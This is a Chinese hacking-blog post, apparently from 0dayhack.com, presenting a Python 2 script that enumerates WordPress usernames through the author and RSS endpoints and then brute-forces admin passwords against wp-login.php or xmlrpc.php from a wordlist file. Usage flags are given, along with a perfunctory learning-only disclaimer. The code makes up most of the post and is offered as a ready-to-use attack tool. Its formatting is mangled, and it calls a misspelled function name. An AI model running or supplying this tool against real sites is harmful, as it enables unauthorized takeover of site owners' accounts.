wordperss 批量爆破(犀利)

  • 内容
  • 相关
先说这一款软件

1.参数化操作

2.内置两种暴力破解方式,通过wp-login模拟发包登录或者采用xmlrpc.php post数据包均可。

3.内置自动获取用户名功能。/?author=1 还有rss 两种方式获取。由于wp主题众多,匹配正则太少,所以会不准。配合百度爬虫试了一下效果,准确率70%。

4.同目录下新建pass.txt 就可以跑密码啦。

代码如下:
#!/usr/bin/env python#coding:utf-8__author__ = 'mtfly'import requestsimport stringimport timeimport refrom optparse import OptionParserdef crack_xmlrpc(username, password, url):
    crack_url = url + "/xmlrpc.php"
    #print crack_url
    post = '''
        <?xml version="1.0" encoding="iso-8859-1"?>
        <methodCall>
          <methodName>wp.getUsersBlogs</methodName>
          <params>
         <param><value>''' + username + '''</value></param>
         <param><value>''' + password + '''</value></param>
          </params>
        </methodCall>'''
    headers = {
        'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
        'Referer': crack_url   }
    try:
        res = requests.post(url=crack_url, data=post, headers=headers, timeout=5).content      #print "ok"
    except Exception, e:
        print "error", e  else:
        if '<int>405</int>' in res:
            print "XML-RPC has been disabled. Please use the wp-admin.php"
        elif "faultCode" in res:
            print "The password is not:", password     elif "isAdmin" in res:
            print "\nThe password is ", password
            exit()def crack_wp_login(username, password, url):
    crack_url = url + "/wp-login.php"
    #print crack_url
    headers = {
        'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    post = {'log': username, 'pwd': password}
    try:
        res = requests.post(url=crack_url, data=post, headers=headers, timeout=5).content  except Exception, e:
        print "error", e  else:
        if 'lostpassword' in res:
            print "The password is not:", password     elif "welcome-panel" in res:
            print "\nThe password is ", password
            exit()def get_author(url):
    get_url0 = url + "/?feed=rss2"
    get_url1 = url + "/?author=1"
    headers = {
        'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
    }
    #print get_url
    try:
        res0 = requests.get(get_url0)
        res1 = requests.get(get_url1)
        html0 = res0.content
        html1 = res1.content
        s0 = re.findall('<dc:creator><\!\[CDATA\[(.*?)\]\]><\/dc:creator>',html0)
        s1 = re.findall('<title>(.*?)\s',html1)
        if len(s1) == 0:
            # print "null"
            # print res.url
            s1 = re.findall('author/(.*?)/', res1.url)
        s = s0 +s1       print "The Username maybe:"
        for i in list(set(s)):
            print i    except Exception, e:
        print e
 
p = OptionParser()p.add_option('-u', '--url', type="string", help='Input the url')p.add_option('-a', '--admin',default="admin", type="string", help='Input the username')p.add_option('-g', '--getauthor',default=False, action="store_true", help='Get admin\'username')p.add_option('-w', '--crack_wp_login',default=False, action="store_true", help='Crack by wp-login')p.add_option('-x', '--crack_xmlrpc',default=False, action="store_true", help='Crack by xmlrpc')options, args = p.parse_args()url = options.url
admin = options.admin
author = options.getauthor
w = options.crack_wp_login
x = options.crack_xmlrpc# url = "http://mtfly.net"# url = "http://127.0.0.1/wp/"print urlif author:
    get_author(url)
    exit()f = open("pass.txt", "r")for line in f:
    #print line.strip()
    if w:
        crack_wp_login(admin, line.strip(), url)
    if x:
        crack_xmlrpr(admin, line.strip(), url)f.close

新建pass.txt并且添加测试密码。

-u 后面接wp的url 记得带上http://

-a 后面跟用户名 默认是admin

-g 自动判断管理员用户名,准确率较低。获取用户名后自动退出。

-w 用 /wp-login.php 模拟后台网页登录

-x 用 /xmlrpc.php接口 POST登录

速度杠杠的   这是没有什么话说的 



  文件名稱:w响应国家号召,禁止资源下载

  更新時間:

  下載声明:响应国家号召,禁止资源下载

立即下載

下载链接

网盘下载

响应国家号召,禁止资源下载

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:wordperss 批量爆破(犀利) - https://www.0dayhack.com/post-32.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注